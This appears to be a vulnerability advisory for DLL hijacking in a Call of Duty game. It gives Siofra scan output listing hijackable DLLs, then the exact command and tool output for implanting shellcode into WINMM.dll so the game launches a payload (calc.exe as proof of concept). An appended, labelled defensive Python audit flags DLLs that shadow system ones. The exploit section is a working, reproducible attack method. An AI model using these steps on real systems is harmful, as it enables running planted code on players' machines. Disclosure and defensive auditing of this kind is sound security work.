+---------------------------------------------------------------------------------
| # Title : Call Of Duty : Modern Warfare 4 DLL Hijacking
| # Author : Febriyanto Nugroho (vmvm1071@gmail.com)
| # Tested on : Windows 7 Ultimate 64-bit (6.1, build 7601)
| # Vendor Link : https://www.activision.com/
+---------------------------------------------------------------------------------
1. Description
===============
I found a bug that could allow hijacking of DLL files in the game
Call Of Duty: Modern Warfare 4. The attacker can inject by inserting a payload
into DLL files that have vulnerabilities.

C:\siofra>Siofra32.exe --mode file-scan -f "D:\MW4\iw3sp.exe" --enum-dependency --dll-hijack
[*] Siofra version 1.13 has entered architecture mode Wow64
======== D:\MW4\iw3sp.exe [32-bit PE] ========
iw3sp.exe
WINMM.dll [!]
msvcrt.dll [KnownDLL]
API-MS-Win-Core-ErrorHandling-L1-1-0.dll [API set]
kernel32.dll [KnownDLL]
USER32.dll [KnownDLL]
GDI32.dll [KnownDLL]
LPK.dll [KnownDLL]
USP10.dll [KnownDLL]
ADVAPI32.dll [KnownDLL]
RPCRT4.dll [KnownDLL]
SspiCli.dll [Base]
CRYPTBASE.dll [Base]
mss32.dll [!]
binkw32.dll [!]
d3d9.dll [!]
VERSION.dll [!]
d3d8thk.dll [!]
dwmapi.dll [!]
d3dx9_34.dll [!]
SHELL32.dll [KnownDLL]
SHLWAPI.dll [KnownDLL]
DDRAW.dll [!]
DCIMAN32.dll [!]
SETUPAPI.dll [KnownDLL]
CFGMGR32.dll [Base]
OLEAUT32.dll [KnownDLL]
ole32.dll [KnownDLL]
DEVOBJ.dll [Base]
[!] Module WINMM.dll vulnerable at D:\MW4\WINMM.dll (real path: C:\Windows\SysWOW64\WINMM.dll)
[!] Module d3d9.dll vulnerable at D:\MW4\d3d9.dll (real path: C:\Windows\SysWOW64\d3d9.dll)
[!] Module VERSION.dll vulnerable at D:\MW4\VERSION.dll (real path: C:\Windows\SysWOW64\VERSION.dll)
[!] Module d3d8thk.dll vulnerable at D:\MW4\d3d8thk.dll (real path: C:\Windows\SysWOW64\d3d8thk.dll)
[!] Module dwmapi.dll vulnerable at D:\MW4\dwmapi.dll (real path: C:\Windows\SysWOW64\dwmapi.dll)
[!] Module d3dx9_34.dll vulnerable at D:\MW4\d3dx9_34.dll (real path: C:\Windows\SysWOW64\d3dx9_34.dll)
[!] Module DDRAW.dll vulnerable at D:\MW4\DDRAW.dll (real path: C:\Windows\SysWOW64\DDRAW.dll)
[!] Module DCIMAN32.dll vulnerable at D:\MW4\DCIMAN32.dll (real path: C:\Windows\SysWOW64\DCIMAN32.dll)
C:\siofra>

The scan results above show that several DLL files loaded by the
Call Of Duty: Modern Warfare 4 game application are vulnerable.

2. Exploiting
===============
Exploitation can be done by saving the DLL file in the Call Of Duty: Modern Warfare 4 game folder:
copy the DLL file into the folder as <file_DLL_original.dll>, then write the modified
DLL file as <vuln_DLL.dll>.

D:\>cd D:\MW4
D:\MW4>C:\siofra\Siofra32.exe --mode infect -f WINMM_original.dll -o WINMM.dll --payload-type process --payload-path C:\Windows\System32\calc.exe
[*] Siofra version 1.13 has entered architecture mode Wow64
[*] Infection mode selected (verbosity level 1).
[*] Successfully read target file WINMM_original.dll (194048 bytes) to memory
[*] Selected process creation shellcode (1177 bytes) for implant
[*] Allocated 1235 bytes for custom shellcode (including path C:\Windows\System32\calc.exe)
[*] Successfully validated chosen PE with entry point 0x000037f1
[*] Entry point at 0x000037f1 tied to section ".text". Checking for relocs overlapping with detour of size 10 to be written to this address
[*] The desired PE contains a valid reloc section at 0x0002f000.
[*] This file has relocations but they do not interfere with the desired detour at 0x000037f1 (10 bytes)
[*] New PE created
File size: 194048 -> 195584 bytes
Detour information
Size: 10
RVA: 0x000037f1
Destination: 0x00031400
Checksum: 0x00035432 -> 0x00034915
Image size: 0x00032000 -> 0x00032000
Implanted section
Name: .reloc (index 3)
RVA: 0x0002f000
Virtual size: 8804 -> 10451 bytes
Raw size: 9216 -> 10752 bytes
Payload address: 0x00031400
Payload size: 1247
[+] Successfully completed appender infection on WINMM_original.dll
[+] Wrote new PE to output file WINMM.dll
D:\MW4>
4. Result
==========
After the payload is injected into the Call Of Duty: Modern Warfare 4 game file,
running the game spawns calc.exe.
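
Added example (not part of the original advisory): a defender-side audit for the condition the scan reports, listing DLLs in an application folder that share a name with a system DLL and so would be loaded ahead of it. The folder names, the KNOWN_DLLS subset and all file contents are constructed for the demo.

```python
import hashlib
import tempfile
from pathlib import Path

# KnownDLLs always load from the system directory, so a same-named file in the
# application folder is ignored by the loader. Constructed subset taken from
# the [KnownDLL] entries in the scan output; the full list on a host is under
# HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.
KNOWN_DLLS = {"kernel32.dll", "user32.dll", "gdi32.dll", "msvcrt.dll", "shell32.dll"}

def sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def find_shadowing_dlls(app_dir, system_dir, known_dlls=KNOWN_DLLS):
    """Return [(name, status)] for DLLs in app_dir that shadow a system DLL.

    status is "identical" when the copy matches the system file byte for byte
    and "modified" when it differs, which is the case to triage first.
    """
    system = {p.name.lower(): p for p in Path(system_dir).iterdir()
              if p.suffix.lower() == ".dll"}
    findings = []
    for dll in sorted(Path(app_dir).iterdir(), key=lambda p: p.name.lower()):
        name = dll.name.lower()
        if dll.suffix.lower() != ".dll" or name in known_dlls:
            continue
        if name in system:
            same = sha256(dll) == sha256(system[name])
            findings.append((name, "identical" if same else "modified"))
    return findings

def demo():
    """Build a constructed game folder and system folder, then audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        app, sysdir = Path(tmp, "MW4"), Path(tmp, "SysWOW64")
        app.mkdir()
        sysdir.mkdir()
        for name in ("WINMM.dll", "VERSION.dll", "kernel32.dll"):
            (sysdir / name).write_bytes(b"system copy of " + name.encode())
        (app / "WINMM.dll").write_bytes(b"altered copy")  # differs from system
        (app / "VERSION.dll").write_bytes(b"system copy of VERSION.dll")
        (app / "kernel32.dll").write_bytes(b"ignored: KnownDLL")
        (app / "mss32.dll").write_bytes(b"game-only DLL, no system twin")
        return find_shadowing_dlls(app, sysdir)

if __name__ == "__main__":
    for name, status in demo():
        print(f"{name}: shadows system DLL ({status})")
```

For a 32-bit executable on 64-bit Windows, as in the scan above, the system directory to compare against is C:\Windows\SysWOW64.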